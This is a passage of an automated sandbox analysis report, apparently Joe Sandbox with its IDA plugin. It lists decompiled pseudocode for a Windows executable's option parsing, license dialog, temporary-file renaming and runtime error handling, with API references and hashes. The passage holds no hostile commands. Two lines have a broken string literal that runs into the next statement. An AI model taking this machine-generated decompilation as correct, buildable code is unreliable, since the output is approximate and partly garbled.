										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00E6C8E4(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00E710CC(_t240 + 0x1040, _t315, E00E6C826(_t278, __eflags), _t315);
													} else {
														E00E7108D(_t240 + 0x1040, _t315, E00E6C7E4(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00E710CC(_t240 + 0x1048, _t315, E00E6C826(_t275, __eflags), _t315);
													} else {
														E00E7108D(_t240 + 0x1048, _t315, E00E6C7E4(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00E710CC(_t240 + 0x1050, _t315, E00E6C826(_t272, __eflags), _t315);
													} else {
														E00E7108D(_t240 + 0x1050, _t315, E00E6C7E4(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00E6C7E4(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00E70D4A(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00E6C7E4(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00E70D4A(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00E6C7E4(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00E70D4A(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E00E6C8E4(_t315);
												__eflags = E00E6C8E4(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00E63F8F(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00E70109(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00E6C8E4(_t315);
											 *(_t240 + 0x2104) = E00E6C8E4(_t315) & 0x00000001;
											_t331 = E00E6C8E4(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00E6C846(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00E6BF24(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00E71748();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00E6C8E4(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00E6C8E4(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00E6C846(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00E6C8E4(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00E6C846(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00E6C8E4(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00E6C8E4(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00E61FB9(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00e620ec
0x00e620f2
0x00e620f9
0x00e620fd
0x00e62102
0x00e6210c
0x00e62763
0x00e6276a
0x00e6276a
0x00e62112
0x00e62114
0x00e6211a
0x00e62121
0x00e6212a
0x00e6212c
0x00e62131
0x00e62133
0x00e62135
0x00000000
0x00000000
0x00e62148
0x00e6214b
0x00e6214d
0x00000000
0x00000000
0x00e62153
0x00e62155
0x00000000
0x00e62165
0x00e62165
0x00e6216a
0x00e6216e
0x00e62173
0x00e62176
0x00e62178
0x00e6217a
0x00e6217c
0x00e62180
0x00e62184
0x00000000
0x00e62194
0x00e62198
0x00e621a9
0x00e621ad
0x00e621b2
0x00e621b8
0x00e621bc
0x00e621c5
0x00e621dd
0x00e621df
0x00e621e2
0x00e621e2
0x00e621e5
0x00e621e5
0x00e621eb
0x00e621ef
0x00e621f8
0x00e62210
0x00e62212
0x00e62215
0x00e62215
0x00e621f8
0x00e62218
0x00e6221c
0x00e6221c
0x00e62224
0x00e62230
0x00e62232
0x00000000
0x00e62243
0x00e62243
0x00e62246
0x00e625f5
0x00e625fa
0x00e625fc
0x00e6262c
0x00e6263a
0x00e62642
0x00e6264d
0x00e62650
0x00e62656
0x00e62659
0x00e62668
0x00e6266d
0x00e62671
0x00e62675
0x00e6267d
0x00e6267d
0x00e6268d
0x00e6269d
0x00e626a2
0x00e626a9
0x00e626b1
0x00e626ba
0x00e626c8
0x00e626d2
0x00e626df
0x00e626e8
0x00e626ee
0x00e626ff
0x00e62704
0x00e62709
0x00e6270d
0x00e62711
0x00e62717
0x00e62721
0x00e62726
0x00e62729
0x00e6272b
0x00e6272d
0x00e6272d
0x00e6272b
0x00e62717
0x00e62733
0x00e6273a
0x00e62744
0x00e625fe
0x00e6260b
0x00e62610
0x00e62614
0x00e62618
0x00e62620
0x00e62620
0x00000000
0x00e625fc
0x00e6224c
0x00e6224f
0x00e625ce
0x00e625d3
0x00e625d5
0x00000000
0x00000000
0x00e625db
0x00e625e3
0x00e625ed
0x00e622a4
0x00e622a6
0x00000000
0x00e622a6
0x00e62255
0x00e62258
0x00e6244f
0x00e62451
0x00000000
0x00000000
0x00e62457
0x00e62462
0x00e62464
0x00e62469
0x00e6246d
0x00e6246f
0x00e62475
0x00e62479
0x00e62479
0x00e6247c
0x00e62480
0x00e62482
0x00e62484
0x00e62486
0x00e624aa
0x00e62488
0x00e62496
0x00e62496
0x00e624af
0x00e624b3
0x00e624b3
0x00e624b7
0x00e624b7
0x00e624ba
0x00e624be
0x00e624c0
0x00e624c2
0x00e624c4
0x00e624e8
0x00e624c6
0x00e624d4
0x00e624d4
0x00e624c4
0x00e624ed
0x00e624f3
0x00e624f3
0x00e624f6
0x00e624fa
0x00e624fc
0x00e62501
0x00e62503
0x00e62527
0x00e62505
0x00e62513
0x00e62513
0x00e6252c
0x00e6252c
0x00e62530
0x00e62535
0x00e6253b
0x00e6253d
0x00e62543
0x00e62548
0x00e62571
0x00e62576
0x00e6254a
0x00e6254c
0x00e62551
0x00e62556
0x00e6255b
0x00e6255d
0x00e6255f
0x00e6256a
0x00e6256a
0x00e6255f
0x00e6257b
0x00e62580
0x00e62589
0x00e6258b
0x00e6258d
0x00e62598
0x00e62598
0x00e6258d
0x00e6259d
0x00e625a2
0x00e625af
0x00e625b1
0x00e625b3
0x00e625c2
0x00e625c2
0x00e625b3
0x00e625a2
0x00e6253d
0x00000000
0x00e62535
0x00e62459
0x00e6245c
0x00000000
0x00000000
0x00000000
0x00e6245c
0x00e6225e
0x00e62261
0x00e623f2
0x00e623f4
0x00000000
0x00000000
0x00e623fa
0x00e62405
0x00e62407
0x00e62413
0x00e62415
0x00e62425
0x00e6242f
0x00e62434
0x00e62445
0x00e62445
0x00000000
0x00e62415
0x00e623fc
0x00e623ff
0x00000000
0x00000000
0x00000000
0x00e623ff
0x00e62267
0x00e6226a
0x00e6237d
0x00e6238c
0x00e62397
0x00e62399
0x00e623a1
0x00e623a7
0x00e623b4
0x00e623b9
0x00e623b9
0x00e623cf
0x00e623d4
0x00e623df
0x00e623e7
0x00e623e8
0x00000000
0x00e623e8
0x00e62270
0x00e62273
0x00e622b2
0x00e622b9
0x00e622c0
0x00e622c9
0x00e622d7
0x00e622dd
0x00e622e4
0x00e622e8
0x00e622ea
0x00e622f3
0x00e622fa
0x00e622fc
0x00e622fe
0x00e622fe
0x00e62304
0x00e62309
0x00e6230d
0x00e6230d
0x00e62311
0x00e62313
0x00e6231c
0x00e62323
0x00e62325
0x00e62327
0x00e62327
0x00e6232a
0x00e62333
0x00e62338
0x00e62338
0x00e6233c
0x00e62343
0x00e6234c
0x00e6234c
0x00e62352
0x00e62359
0x00e62362
0x00e62362
0x00e62368
0x00000000
0x00e62368
0x00e62278
0x00000000
0x00000000
0x00e62282
0x00e62290
0x00e62290
0x00e62293
0x00e6229c
0x00e622a1
0x00e622a2
0x00000000
0x00e622a2
0x00e6274b
0x00e6274b
0x00e6274b
0x00e6274f
0x00e62755
0x00e6275a
0x00000000
0x00000000
0x00000000
0x00e6275a
0x00e62224
0x00e62184
0x00e62155
0x00e62762

Strings

;%u, xrefs: 00E6241C
xc%u, xrefs: 00E6265C
x%u, xrefs: 00E625FF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 44682af39791876e75c487b715328de5b4434ddc7f9545b19b56702dfa246beb
Instruction ID: a4e23e363e16f9bae38fc852a224af05b3c5ebbdbfb588d4b0d8a4e909aeaf3b
Opcode Fuzzy Hash: 44682af39791876e75c487b715328de5b4434ddc7f9545b19b56702dfa246beb
Instruction Fuzzy Hash: 99F17E30A847405BDB24EF24A495BFE77D5AF94384F08646EFE85FB243DB20A944C762

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E7AF60(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00E6130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00E7CFEE(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xeac574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xeb6b7c;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xebec94;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xec20cc(0xf));
					 *0xec20c8(_t34);
					_t30 =  *0xea8444; // 0x0
					E00E79878(_t30, __eflags,  *0xea0ed4, _t37,  *0xebec90, 0, 0);
					L00E8389E( *0xebec94);
					L00E8389E( *0xebec90);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00e7af60
0x00e7af61
0x00e7af67
0x00e7af6e
0x00e7af87
0x00e7b073
0x00e7b075
0x00000000
0x00e7b075
0x00e7af8d
0x00e7af93
0x00e7afc0
0x00e7afc5
0x00e7afca
0x00e7afcc
0x00e7afd7
0x00e7afd7
0x00e7afdd
0x00e7afe2
0x00e7afe4
0x00e7aff0
0x00e7aff0
0x00e7aff6
0x00e7affb
0x00e7affd
0x00e7b001
0x00e7b001
0x00e7b016
0x00e7b01e
0x00e7b034
0x00e7b03b
0x00e7b041
0x00e7b056
0x00e7b061
0x00e7b06c
0x00000000
0x00e7b072
0x00e7af98
0x00e7afa7
0x00000000
0x00e7afa7
0x00e7af9d
0x00e7afa0
0x00e7afbb
0x00e7afaf
0x00e7afb0
0x00000000
0x00e7afb0
0x00e7afa5
0x00e7afae
0x00000000
0x00e7afae
0x00000000

APIs

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

EndDialog.USER32(?,00000001), ref: 00E7AFB0
SendMessageW.USER32(?,00000080,00000001,?), ref: 00E7AFD7
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E7AFF0
SetWindowTextW.USER32(?,?), ref: 00E7B001
GetDlgItem.USER32(?,00000065), ref: 00E7B00A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E7B01E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E7B034

Strings

LICENSEDLG, xrefs: 00E7AF74

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 05c60e73e651b06165c15a0bf70b48085f72dfe70b7479efd6e4c6f6434b98eb
Instruction ID: 7cfdfa9970742748181c2ef4ac18c707de74919cba978b74fc8ab9cf741afb70
Opcode Fuzzy Hash: 05c60e73e651b06165c15a0bf70b48085f72dfe70b7479efd6e4c6f6434b98eb
Instruction Fuzzy Hash: 8F218272244200BFE6255F72EC49F7B7E6DEB4AB45F085029F709B51A0CB52A8059732

Uniqueness

Uniqueness Score: -1.00%

Function 00E695E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E695E0(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00E7E554(E00E92168, _t84);
				E00E7E630();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4038;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5038, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00E6BE89(_t91, _t84 - 0x4038);
							_t78 = E00E6BE89(_t91, _t84 - 0x5038);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00E71AC4( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00E71AC4(E00E6BE89(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00E70131(_t84 - 0x1010, _t82, 0x800);
											E00E63F8F(E00E6BE89(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00E6A373(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00E70131(_t84 - 0x3038, _t82, 0x800);
										_push(0x800);
										E00E6BEFF(_t98, _t84 - 0x3038,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3038, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00E697B6(_t84 - 0x2038);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E00E6A373(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E00E698BE(_t84 - 0x2038);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3038);
											if(_t68 != 0) {
												E00E69870(_t84 - 0x2038);
												E00E699B7(_t84 - 0x2038, _t82);
											}
											E00E697F0(_t84 - 0x2038, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

0x00e695e5
0x00e695ef
0x00e695f6
0x00e695f9
0x00e69608
0x00e69610
0x00e697a1
0x00e697a1
0x00e697a1
0x00e6961e
0x00e69627
0x00e6962f
0x00000000
0x00e69635
0x00e69635
0x00e69637
0x00000000
0x00e6963d
0x00e69649
0x00e69658
0x00e6965a
0x00e6965f
0x00000000
0x00e69665
0x00e69669
0x00e6966e
0x00e69670
0x00000000
0x00e69676
0x00e6967e
0x00e69685
0x00000000
0x00e6968b
0x00e6968b
0x00e69692
0x00e69694
0x00e69694
0x00e69697
0x00000000
0x00000000
0x00e696a6
0x00e696c3
0x00e696c8
0x00e696d9
0x00e696e6
0x00e696db
0x00e696db
0x00e696dd
0x00e696dd
0x00e696ed
0x00e696f6
0x00000000
0x00e696f8
0x00e696f8
0x00e696fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00e696fb
0x00000000
0x00e696f6
0x00e6970f
0x00e69714
0x00e6971f
0x00e6973a
0x00000000
0x00e6973c
0x00e69742
0x00e69748
0x00e69752
0x00e69754
0x00e69756
0x00e69762
0x00e69762
0x00e69772
0x00e6977a
0x00e69782
0x00e6978d
0x00e6978d
0x00e69798
0x00e6979d
0x00e6979d
0x00e6973a
0x00e69685
0x00e69670
0x00e6965f
0x00e69637
0x00e6962f
0x00e697a3
0x00e697a9
0x00e697b3

APIs

__EH_prolog.LIBCMT ref: 00E695E5
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E69608
GetShortPathNameW.KERNEL32 ref: 00E69627

Part of subcall function 00E71AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E6B250,?,?,?,00E6B1FE,?,-00000002,?,00000000,?), ref: 00E71ADA

_swprintf.LIBCMT ref: 00E696C3

Part of subcall function 00E63F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E63FA2

MoveFileW.KERNEL32(?,?), ref: 00E69732
MoveFileW.KERNEL32(?,?), ref: 00E69772

Strings

rtmp%d, xrefs: 00E696AC

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 63c663bb4bd97ce9edf7aa6bdbf9333fffd6ad8ea30c54ae9302eb0964c626cc
Instruction ID: 6cd532d86d999dc78ac3bd26e93632836ea135b68246e8a46f3248d6ed2c0982
Opcode Fuzzy Hash: 63c663bb4bd97ce9edf7aa6bdbf9333fffd6ad8ea30c54ae9302eb0964c626cc
Instruction Fuzzy Hash: C54140719512586ADF20EFA0EC85ADE73BCAF403C4F1464E6B549F7143DA359B88CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E892B5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00E892B5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xe9e6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00E888C9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00E8A981(_t25, _t36, __eflags,  *0xe9e6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00E8911B(_t25, _t31, "X\xef\xbf\x							E00E887FE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00E887FE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00E88886(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xe9e6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00E888C9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00E8A981(_t27, _t37, __eflags,  *0xe9e6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00E8911B(_t27, _t32, "X\xef\xbf\x									E00E887FE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00E887FE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00E8A92B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00E8A92B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00e892b5
0x00e892b5
0x00e892b5
0x00e892bf
0x00e892c1
0x00e892c6
0x00e892c9
0x00e892d7
0x00e892de
0x00e892e3
0x00e892e6
0x00e892e9
0x00e892fb
0x00e89300
0x00e89302
0x00e8930d
0x00e89314
0x00e89319
0x00e8931c
0x00e8931e
0x00000000
0x00000000
0x00000000
0x00000000
0x00e89304
0x00e89304
0x00000000
0x00e89304
0x00e892eb
0x00e892eb
0x00e892ec
0x00e892ec
0x00e892f1
0x00e8932c
0x00e8932d
0x00e89333
0x00e89338
0x00e8933b
0x00e8933c
0x00e8933d
0x00e89344
0x00e89346
0x00e89348
0x00e8934d
0x00e89350
0x00e8935e
0x00e8936a
0x00e8936d
0x00e89370
0x00e89382
0x00e89387
0x00e89389
0x00e89394
0x00e8939a
0x00e893a2
0x00e893a4
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8938b
0x00e8938b
0x00000000
0x00e8938b
0x00e89372
0x00e89372
0x00e89373
0x00e89373
0x00e893a6
0x00e893a7
0x00e893a7
0x00e89352
0x00e89358
0x00e8935c
0x00e893af
0x00e893b0
0x00e893b6
0x00000000
0x00000000
0x00000000
0x00e8935c
0x00e893bd
0x00e893bd
0x00e892cb
0x00e892d1
0x00e892d5
0x00e89320
0x00e89321
0x00e8932b
0x00000000
0x00000000
0x00000000
0x00e892d5

APIs

GetLastError.KERNEL32(?,00EA0F50,00E840E4,00EA0F50,?,?,00E83B5F,?,?,00EA0F50), ref: 00E892B9
_free.LIBCMT ref: 00E892EC
_free.LIBCMT ref: 00E89314
SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E89321
SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E8932D
_abort.LIBCMT ref: 00E89333

Strings

X, xrefs: 00E89307

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: X
API String ID: 3160817290-1677210272
